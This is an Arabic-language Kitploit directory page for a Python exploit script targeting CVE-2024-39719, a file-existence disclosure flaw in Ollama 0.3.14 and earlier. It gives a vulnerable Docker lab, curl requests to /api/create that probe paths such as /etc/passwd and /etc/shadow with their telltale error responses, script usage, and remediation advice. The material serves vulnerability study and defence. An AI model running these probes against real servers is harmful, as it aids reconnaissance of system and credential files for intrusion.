Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-39719 — نص استغلال بايثون لـ CVE-2024-39719، ثغرة كشف وجود ملفات في Ollama. يختبر نقاط نهاية API لكشف مسارات ملفات الخادم، مما يساعد في تحليل الثغرات واختبار الاختراق. | Kitploit
أدوات/GitHubGitHub/srcx404/cve-2024-39719
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالتعلم والتعليم
GitHubsrcx404/cve-2024-39719

CVE-2024-39719

نص استغلال بايثون لـ CVE-2024-39719، ثغرة كشف وجود ملفات في Ollama. يختبر نقاط نهاية API لكشف مسارات ملفات الخادم، مما يساعد في تحليل الثغرات واختبار الاختراق.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تحليل ثغرة الكشف عن وجود ملفات في Ollama (CVE-2024-39719)

中文

نظرة عامة على الثغرة

CVE-2024-39719 هي ثغرة كشف وجود ملفات تؤثر على إصدارات Ollama 0.3.14 والإصدارات الأقدم. تسمح هذه الثغرة للمهاجمين باكتشاف وجود ملفات محددة على الخادم من خلال نقطة نهاية API، مما قد يؤدي إلى تسرب المعلومات.

تاريخ الإصدار: 31 أكتوبر 2024

تفاصيل الثغرة

السبب الجذري

توجد الثغرة في نقطة النهاية /api/create في Ollama. عندما يستدعي المهاجم API CreateModel مع معامل مسار، يقوم الخادم بإرجاع رسائل خطأ مختلفة بناءً على ما إذا كان المسار موجودًا أم لا. يسمح هذا السلوك للمهاجم بتحديد ما إذا كان ملف أو دليل معين موجودًا على الخادم من خلال تحليل رسائل الخطأ.

المشكلة الأساسية هي أنه عند معالجة إدخال المستخدم، يقوم النظام بكشف أخطاء نظام الملفات مباشرة للعميل بدلاً من إخفاء معلومات وجود المسار بشكل صحيح.

الإصدارات المتأثرة

تؤثر هذه الثغرة على جميع إصدارات Ollama حتى الإصدار 0.3.14 وما يشملها.

التأثير

على الرغم من أن ثغرة كشف وجود الملفات قد تبدو أقل خطورة في البداية، إلا أنها يمكن أن:

  1. تكون خطوة أولية في هجمات أكثر تعقيدًا، مما يساعد المهاجمين على جمع معلومات عن الخادم
  2. تُستخدم لاكتشاف وجود ملفات إعدادات حرجة، أو شهادات، أو ملفات بيانات حساسة
  3. تساعد المهاجمين في شن هجمات أكثر استهدافًا
  4. تؤدي إلى تسرب المعلومات في بيئات محددة، مثل تأكيد وجود مستخدمين معينين أو خصائص النظام

إعادة إنتاج الثغرة

إعداد البيئة

  1. قم بإنشاء بيئة Ollama ضعيفة باستخدام ملف Docker Compose التالي:
root@kitploit:~
services:
  ollama:
    image: ollama/ollama:0.3.14
    container_name: ollama
    volumes:
      - ollama:/root/.ollama
    ports:
      - "11434:11434"

volumes:
  ollama:
  1. ابدأ الخدمة:
root@kitploit:~
docker compose up -d
  1. بعد بدء الخدمة، يمكنك تأكيد أن Ollama 0.3.14 قيد التشغيل عن طريق الوصول إلى http://your-ip:11434/.

خطوات إعادة الإنتاج

1. اختبار الملفات غير الموجودة

أرسل طلبًا باستخدام curl لمحاولة الوصول إلى ملف غير موجود:

root@kitploit:~
curl "http://your-ip:11434/api/create" -d '{"name": "file-leak-existence","path": "/tmp/non-existing"}'

Response:

root@kitploit:~
{"error":"error reading modelfile: open /tmp/non-existing: no such file or directory"}

2. اختبار الملفات الموجودة

اختبر وجود ملف، مثل /etc/passwd:

root@kitploit:~
curl "http://your-ip:11434/api/create" -d '{"name": "file-leak-existence","path": "/etc/passwd"}'

Response:

root@kitploit:~
{"error":"no FROM line for the model was specified"}

من خلال تحليل رسائل الخطأ المختلفة هذه، يمكن للمهاجم تحديد ما إذا كان المسار الهدف موجودًا أم لا، مما يسمح له بالحصول على معلومات حول هيكل ملفات الخادم. لاحظ أن المعلومات التي يُرجعها الخادم قد تختلف حسب الإصدار.

معالجة الثغرة

الإصلاح الرسمي

قامت Ollama بإصلاح هذه الثغرة في الإصدارات الأحدث. تشمل الإصلاحات:

  1. توحيد معالجة الأخطاء لتجنب تسريب معلومات وجود الملفات
  2. تنفيذ تحقق وتصفية أكثر صرامة للمسارات التي يوفرها المستخدم
  3. استخدام رسائل خطأ أكثر عمومية لا تكشف مباشرة عن معلومات نظام الملفات

خطوات المعالجة الموصى بها

  1. ترقية Ollama: الحل الأكثر فعالية هو الترقية إلى أحدث إصدار من Ollama.
  2. التحكم في الوصول: تقييد الوصول إلى نقاط نهاية API، مما يسمح فقط للمستخدمين المصرح لهم.
  3. عزل الشبكة: عند الإمكان، قم بنشر خدمات Ollama في شبكات معزولة لتقليل الوصول الخارجي.
  4. المراقبة: تعزيز مراقبة استدعاءات API، مع التركيز بشكل خاص على اكتشاف أنماط الوصول غير المعتادة إلى نقطة النهاية /api/create.

استخدام سكريبت الاستغلال

يسمح لك سكريبت Python المقدم باختبار ما إذا كان خادم Ollama عرضة لـ CVE-2024-39719.

المتطلبات

  • Python 3.x
  • الحزم المطلوبة: requests, termcolor

التثبيت

root@kitploit:~
pip install requests termcolor

الاستخدام

root@kitploit:~
python CVE_2024_39719.py -u <ollama-server-url> [-f <file-to-check>]

الخيارات

  • -u, --url: رابط خادم Ollama (مطلوب)
  • -f, --file: الملف المراد التحقق من وجوده (الافتراضي هو "/etc/passwd")

أمثلة

root@kitploit:~
# التحقق مما إذا كان الخادم عرضة للثغرة
python CVE_2024_39719.py -u http://your-ip:11434

# التحقق مما إذا كان ملف معين موجودًا
python CVE_2024_39719.py -u http://your-ip:11434 -f /etc/shadow

المراجع

  • CVE-2024-39719 في قاعدة بيانات الثغرات الوطنية
  • مستودع Ollama على GitHub
  • نصائح أمان Ollama

إخلاء مسؤولية

هذا السكريبت مقدم للأغراض التعليمية واختبار الأمان المشروع فقط. تأكد دائمًا من حصولك على الإذن المناسب قبل اختبار أي نظام للثغرات. قد يؤدي الاختبار غير المصرح به إلى انتهاك القوانين واللوائح.

تنزيل الأداة